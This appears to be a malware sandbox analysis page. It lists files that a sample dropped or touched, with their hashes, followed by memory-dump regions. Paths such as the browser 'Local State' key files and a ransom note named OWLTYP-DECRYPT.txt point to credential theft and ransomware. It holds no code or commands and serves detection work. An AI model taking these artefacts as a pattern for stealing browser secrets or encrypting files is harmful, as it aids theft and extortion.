972b023c7659412aa71c2a49979071142cae455e9bfb815c91ae0e36306e897a

SHA512
e8ff1fbc4ebffb1cfe021bb5464fd39ef756dec0ff4d9f8f9808d826391bd46cf7271288be5f8852687a74942761981c4bc87f640ee83ff968bae3fc219264a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ba1695e482e91e75eef76a67a79a5dbe

SHA1
edb8e0dde5991da03fc308dcc5f1f3af27d5e868

SHA256
f9c74028124530d8f22305b678c87c86afe0a9247a523511d60bea0571c5d21b

SHA512
9c8d93065ef1791370e7806ec409545283efb1dce89780576375a4f28e215a15adf517ddca7787b55f5669fdaa82059281c7a77758307f7715c8df7b741daeb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6000b9fb770b686ab3759deb764c3193

SHA1
7fb5787c79f2dd9e3b409bf10403a40f4b97ab85

SHA256
bc59b9ae80a2a90cb1450b3220ce6fe54142998e0d2a6d6a21e5f60643f68571

SHA512
d77aa085f28ca9fdbaf3375c15f0d881edc1380bc043f565cfd134ba0bb700a80f47a268d07b12160bf9c8b35366755ed38767641ad7ad6696667df5d0c2ea0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
58710ab82c54c2c58d74cc0f1756fda9

SHA1
8c00f9352cc364bcd236d864f3f1a88138972cdd

SHA256
d33f8814634db4442e6122b1f1b53474ccc9d100ab4eea1a0ffcb1ced644587b

SHA512
99f1b37f0ef3a62e505109f3730b16a4237afecaa93a6feef0ea0a3ce570b3ac230576d37321642780cae5c98d7c5aea99879851e6369c83078394a126b49bb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

Filesize
896KB

MD5
8a410ca32cfa68b6af87dd2a15895e22

SHA1
78218033b8278df0e23513baaffdfc346efaf5cb

SHA256
078710f879b2d154a2ca8d9983b4ba9a90fc0be52a52c98658ad9c2c5fa5592c

SHA512
de46b955a9e9ca25d045efae4f34367a5b5832d36e49291d0c5e237381af12045a479b0d53777ab135db15b7af09f24152d48210ba24e4ffe0bc815b9936972e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

Filesize
9KB

MD5
7050d5ae8acfbe560fa11073fef8185d

SHA1
5bc38e77ff06785fe0aec5a345c4ccd15752560e

SHA256
cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

SHA512
a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
65KB

MD5
cd28ade5117459e05f1c01e26eb03673

SHA1
c29734e267a1401c3f39addf901b2b58350f1ce4

SHA256
dcc1f29e37c2178ea153cffac776465bbdceb744a5532170361bdc4a58cb5988

SHA512
a470548baf0cf91b5891ebada5dd941802407560cb19efe9d206cbdc08dc1c8dace078a301d9ae3b9501a495de8147266ce4b48455107a09ed7a5ab4d3b67df2

Download Submit
C:\Users\Admin\AppData\Local\Temp\77696E766965772E6F6378FA.tmp

Filesize
512B

MD5
72202400c5cd480677822f78f9b43f57

SHA1
6082367258b07580e4564f7e0c2caa1ee3ece91b

SHA256
9d5e0b5f30c66dcb310be9a73aeb67ba69d9dcf39f775ece00c8c38a7be7b877

SHA512
e1eb8ee49180922175a33117c68343f4a4f9e683c22c1a59b0603b95c067957b344df0fd0725ce4b3f66ba69057c53994ca63b2279aa84ca603c2688a4201c9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2sgyx50.ed0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe

Filesize
5KB

MD5
f9e42c92e371cedc22c78e2900418651

SHA1
3e99ba4a4a007d2ad1cfa6e3fda91b01a710839d

SHA256
f340bf91627787a2770c897aa9555bb82382cdcc2232904b5707238ab0a85e39

SHA512
7ca0a18f7ae83f0d11d8b33ddca579fb5e5629b5255eebf28b2e256a0b4449f4dee5bdff2ef6f9e1af323a04111a688d9251629ddecb046746978f94d469de05

Download Submit
C:\Users\Admin\AppData\Local\Temp\jplmbcuny

Filesize
4KB

MD5
0dbceb0fc7bcb589c214a5cbdf34b95b

SHA1
e7f948a31c2ce8ac25cce1169654435cec455bef

SHA256
7a5c8835a40792321f57502a295e3972d2b1b1288ae9bd2e8899169a67941097

SHA512
7be085588931f5ca5fe9622e6b758eb5da6dbd683732814e1c570e113b0d144088dbfe52f3c5116619a4df97b45b8d5804581bb807e0725b353520cc4b2432da

Download Submit
C:\Users\Admin\AppData\Local\Temp\jurqlvqzsu80j5x5

Filesize
103KB

MD5
d36bfa103f3793806490cc1e20ceb429

SHA1
9ffc447f3faf0bd6047af095650237c6be04cc5e

SHA256
098b0f7a8e149f3f30525c7d956324bdef23f43648ad136ed21b393f21e64f99

SHA512
7662f73f06600360f83af60bdf9b8be37e8eca9702b804161df59697f26c3f14679dce7c9c0f24a49aadced618a1885b690df8477768068b5f4f2182fde4c7cb

Download Submit
C:\Users\Admin\AppData\Local\ad0825eb385d7b9cab8700d4b51b3a2d\Admin@HFFTDKON_en-US\System\Process.txt

Filesize
4KB

MD5
e422869731753a9fd228ea26542a30d6

SHA1
0afa32aca97c91bb8893c4671da016a5448fd349

SHA256
2a4767d1d8ec7c748dd3bd1db3f6b280f54979e83f393207bceef426c1a7d29c

SHA512
966ea2ad28b33e6d26be4ef56d733880e55ea1fc16d98d873774cf868fab804412d1f7136e26c24c7c5f86f7d88418dc05f685114710b5559f4cbe39db798932

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-242286936-336880687-2152680090-1000\OWLTYP-DECRYPT.txt

Filesize
8KB

MD5
0174e3cdc2861cf2288aea17a24ce88f

SHA1
cf33bb37f141f3feb16fd13b9e5949391d29f766

SHA256
4d203c6f5f6d44b8b8e11d941c255d1be7ff6790dcc907f60a04608738cdb858

SHA512
927881c6e60b90fc87da144ebd516033ae29a8667bc5a415389ecd533fb091074cf2e9cbaad70e7804d45ef691f482a43ea44e7912b741a2e5cf144342c432bd

Download Submit
\??\c:\zh.xs

Filesize
37B

MD5
e1716c5ad1077780f8698d36177aad03

SHA1
4d4edeb0e728917e0ef925a164ac8cfcd05a5071

SHA256
a34ed34917197f063e97eb47326273c15de25012870c0f27836456d4db0cf529

SHA512
7025026ac2141adf4856064b28f6072b13ae6874d7918323b693ca6b730de32e14120af5d222bc621710df004112c8d18e70ec707ab6fafe5520cc51dcc7bddf

Download Submit
memory/644-342-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/644-49-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/644-20-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/644-408-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/644-32-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/912-196-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/912-2775-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1232-2720-0x000002C2515D0000-0x000002C25171F000-memory.dmp

Filesize
1.3MB

Download
memory/1252-53-0x0000000000740000-0x0000000000816000-memory.dmp

Filesize
856KB

Download
memory/1712-261-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/1872-2824-0x0000015673160000-0x00000156732AF000-memory.dmp

Filesize
1.3MB

Download
memory/2252-2499-0x0000000000650000-0x000000000067B000-memory.dmp

Filesize
172KB

Download
memory/2252-2451-0x0000000000720000-0x0000000000739000-memory.dmp

Filesize
100KB

Download
memory/2304-231-0x0000000000610000-0x0000000000630000-memory.dmp

Filesize
128KB

Download
memory/2336-126-0x00000000026B0000-0x00000000026DA000-memory.dmp

Filesize
168KB

Download
memory/2336-125-0x00000000026B0000-0x00000000026DA000-memory.dmp

Filesize
168KB

Download
memory/2348-488-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-2502-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-195-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-2300-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-1645-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-2102-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-487-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-2900-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-2717-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2348-1878-0x0000000000400000-0x000000000048A000-memory.dmp

Filesize
552KB

Download
memory/2352-2359-0x000000000AAD0000-0x000000000AB02000-memory.dmp

Filesize
200KB

Download
memory/2352-2358-0x000000000ACF0000-0x000000000AD64000-memory.dmp

Filesize
464KB

Download
memory/2352-325-0x0000000000E70000-0x0000000000F0A000-memory.dmp

Filesize
616KB

Download
memory/2352-420-0x000000000AA70000-0x000000000AA88000-memory.dmp

Filesize
96KB

Download
memory/2544-101-0x00000000004F0000-0x00000000005C6000-memory.dmp

Filesize
856KB

Download
memory/2816-1493-0x0000000006F50000-0x0000000006F72000-memory.dmp

Filesize
136KB

Download
memory/2816-282-0x00000000050B0000-0x00000000056DA000-memory.dmp

Filesize
6.2MB

Download
memory/2816-363-0x00000000057A0000-0x00000000057C2000-memory.dmp

Filesize
136KB

Download
memory/2816-275-0x0000000004940000-0x0000000004976000-memory.dmp

Filesize
216KB

Download
memory/2816-1492-0x0000000006F00000-0x0000000006F1A000-memory.dmp

Filesize
104KB

Download
memory/2816-364-0x0000000005840000-0x00000000058A6000-memory.dmp

Filesize
408KB

Download
memory/2816-511-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

Filesize
304KB

Download
memory/2816-2975-0x00000000088A0000-0x000000000B084000-memory.dmp

Filesize
39.9MB

Download
memory/2816-510-0x0000000004C80000-0x0000000004C9E000-memory.dmp

Filesize
120KB

Download
memory/2816-1573-0x0000000008220000-0x000000000889A000-memory.dmp

Filesize
6.5MB

Download
memory/2816-1491-0x0000000006FA0000-0x0000000007036000-memory.dmp

Filesize
600KB

Download
memory/2816-376-0x0000000005940000-0x0000000005C97000-memory.dmp

Filesize
3.3MB

Download
memory/2816-365-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/2884-317-0x00000000004E0000-0x00000000004EE000-memory.dmp

Filesize
56KB

Download
memory/2888-398-0x0000000003100000-0x000000000310C000-memory.dmp

Filesize
48KB

Download
memory/2888-400-0x000000001C540000-0x000000001C54E000-memory.dmp

Filesize
56KB

Download
memory/2888-394-0x0000000001590000-0x000000000159E000-memory.dmp

Filesize
56KB

Download
memory/2888-259-0x0000000001540000-0x0000000001546000-memory.dmp

Filesize
24KB

Download
memory/2888-403-0x000000001C550000-0x000000001C55C000-memory.dmp

Filesize
48KB

Download
memory/2888-266-0x000000001BD60000-0x000000001BEE4000-memory.dmp

Filesize
1.5MB

Download
memory/2888-277-0x0000000001570000-0x0000000001576000-memory.dmp

Filesize
24KB

Download
memory/2888-254-0x0000000000D60000-0x0000000000E3C000-memory.dmp

Filesize
880KB

Download
memory/2888-395-0x00000000030F0000-0x00000000030FE000-memory.dmp

Filesize
56KB

Download
memory/3032-265-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-314-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-3-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-0-0x00000000750E1000-0x00000000750E2000-memory.dmp

Filesize
4KB

Download
memory/3032-2-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-401-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-1-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3032-341-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/3248-2587-0x0000000015170000-0x0000000015253000-memory.dmp

Filesize
908KB

Download
memory/3468-533-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3468-1243-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3468-1244-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3468-534-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3468-537-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3468-536-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/3884-54-0x0000000000740000-0x0000000000772000-memory.dmp

Filesize
200KB

Download
memory/4252-410-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4252-551-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4252-450-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4252-55-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4252-56-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4252-409-0x00000000750E0000-0x0000000075691000-memory.dmp

Filesize
5.7MB

Download
memory/4584-407-0x000000001B720000-0x000000001B730000-memory.dmp

Filesize
64KB

Download
memory/4584-351-0x0000000002A60000-0x0000000002A70000-memory.dmp

Filesize
64KB

Download
memory/4584-419-0x000000001B730000-0x000000001B73E000-memory.dmp

Filesize
56KB

Download
memory/4584-345-0x0000000002990000-0x00000000029A0000-memory.dmp

Filesize
64KB

Download
memory/4584-375-0x000000001B6A0000-0x000000001B6B2000-memory.dmp

Filesize
72KB

Download
memory/4584-382-0x000000001BB80000-0x000000001BB92000-memory.dmp

Filesize
72KB

Download
memory/4584-397-0x000000001B6C0000-0x000000001B6D0000-memory.dmp

Filesize
64KB

Download
memory/4584-380-0x000000001B740000-0x000000001B756000-memory.dmp

Filesize
88KB

Download
memory/4584-378-0x000000001B680000-0x000000001B690000-memory.dmp

Filesize
64KB

Download
memory/4584-334-0x0000000002A30000-0x0000000002A4C000-memory.dmp

Filesize
112KB

Download
memory/4584-336-0x000000001B6D0000-0x000000001B720000-memory.dmp

Filesize
320KB

Download
memory/4584-383-0x000000001C0D0000-0x000000001C5F8000-memory.dmp

Filesize
5.2MB

Download
memory/4584-417-0x000000001BC00000-0x000000001BC5A000-memory.dmp

Filesize
360KB

Download
memory/4584-328-0x0000000002980000-0x000000000298E000-memory.dmp

Filesize
56KB

Download
memory/4584-349-0x00000000029A0000-0x00000000029B0000-memory.dmp

Filesize
64KB

Download
memory/4584-354-0x0000000002A70000-0x0000000002A7E000-memory.dmp

Filesize
56KB

Download
memory/4584-347-0x0000000002A80000-0x0000000002A98000-memory.dmp

Filesize
96KB

Download
memory/4584-429-0x000000001B760000-0x000000001B770000-memory.dmp

Filesize
64KB

Download
memory/4584-385-0x000000001B690000-0x000000001B69E000-memory.dmp

Filesize
56KB

Download
memory/4584-90-0x0000000000610000-0x0000000000942000-memory.dmp

Filesize
3.2MB

Download
memory/4584-313-0x0000000002A00000-0x0000000002A26000-memory.dmp

Filesize
152KB

Download
memory/4584-432-0x000000001BBD0000-0x000000001BBE8000-memory.dmp

Filesize
96KB

Download
memory/4680-2283-0x00000225ACC90000-0x00000225ACDDF000-memory.dmp

Filesize
1.3MB

Download
memory/4900-258-0x0000000005690000-0x000000000572C000-memory.dmp

Filesize
624KB

Download
memory/4900-257-0x0000000000AD0000-0x0000000000CE4000-memory.dmp

Filesize
2.1MB

Download
memory/4900-276-0x0000000005920000-0x0000000005976000-memory.dmp

Filesize
344KB

Download
memory/4900-264-0x0000000005730000-0x00000000057C2000-memory.dmp

Filesize
584KB

Download
memory/4900-274-0x0000000005650000-0x000000000565A000-memory.dmp

Filesize
40KB

Download
memory/4900-263-0x0000000005CE0000-0x0000000006286000-memory.dmp

Filesize
5.6MB

Download
memory/4992-1948-0x00000265749C0000-0x00000265749E2000-memory.dmp

Filesize
136KB

Download
memory/4992-2521-0x00000265749F0000-0x0000026574B3F000-memory.dmp

Filesize
1.3MB

Download
memory/5260-2523-0x00000259EFD70000-0x00000259EFEBF000-memory.dmp

Filesize
1.3MB

Download
memory/5688-2117-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/5688-495-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/5688-1880-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/5688-1669-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/5756-2177-0x0000026998480000-0x00000269985CF000-memory.dmp

Filesize
1.3MB

Download
memory/5756-2037-0x00000269FE000000-0x00000269FE00A000-memory.dmp

Filesize
40KB

Download
memory/5756-2027-0x00000269FF810000-0x00000269FF82C000-memory.dmp

Filesize
112KB

Download
memory/5756-2038-0x0000026998820000-0x0000026998828000-memory.dmp

Filesize
32KB

Download
memory/5756-2039-0x00000269FE010000-0x00000269FE01A000-memory.dmp

Filesize
40KB

Download
memory/5856-2767-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5936-1652-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1651-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1663-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1660-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1655-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1653-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/5936-1654-0x0000000000180000-0x00000000001A0000-memory.dmp

Filesize
128KB

Download
memory/6120-2353-0x000001D969F90000-0x000001D96A0DF000-memory.dmp

Filesize
1.3MB

Download
memory/6212-2568-0x000001FEB7F60000-0x000001FEB80AF000-memory.dmp

Filesize
1.3MB

Download
memory/6332-1643-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6332-1635-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6332-1672-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6332-1673-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6332-1634-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6332-1644-0x0000000004700000-0x0000000004710000-memory.dmp

Filesize
64KB

Download
memory/6780-2564-0x00000206D1550000-0x00000206D169F000-memory.dmp

Filesize
1.3MB

Download
memory/6796-2565-0x0000021BF0DF0000-0x0000021BF0F3F000-memory.dmp

Filesize
1.3MB

Download
memory/6816-3047-0x00007FF859030000-0x00007FF8593A4000-memory.dmp

Filesize
3.5MB

Download
memory/6816-3049-0x00007FF859800000-0x00007FF8598A3000-memory.dmp

Filesize
652KB

Download
memory/6816-3048-0x00007FF85AF10000-0x00007FF85AFBE000-memory.dmp

Filesize
696KB

Download
memory/6816-3046-0x00007FF85A6A0000-0x00007FF85A75D000-memory.dmp

Filesize
756KB

Download
memory/6816-3045-0x00007FF85B680000-0x00007FF85B889000-memory.dmp

Filesize
2.0MB

Download
memory/6816-3044-0x00007FF72D020000-0x00007FF72D032000-memory.dmp

Filesize
72KB

Download
memory/7136-2270-0x000001CB9DC70000-0x000001CB9DDBF000-memory.dmp

Filesize
1.3MB

Download
memory/7564-2591-0x0000000002860000-0x000000000286E000-memory.dmp

Filesize
56KB

Download
memory/7564-2586-0x0000000002840000-0x000000000284E000-memory.dmp

Filesize
56KB

Download
memory/7564-2635-0x0000000002870000-0x000000000287C000-memory.dmp

Filesize
48KB

Download
memory/7912-2363-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads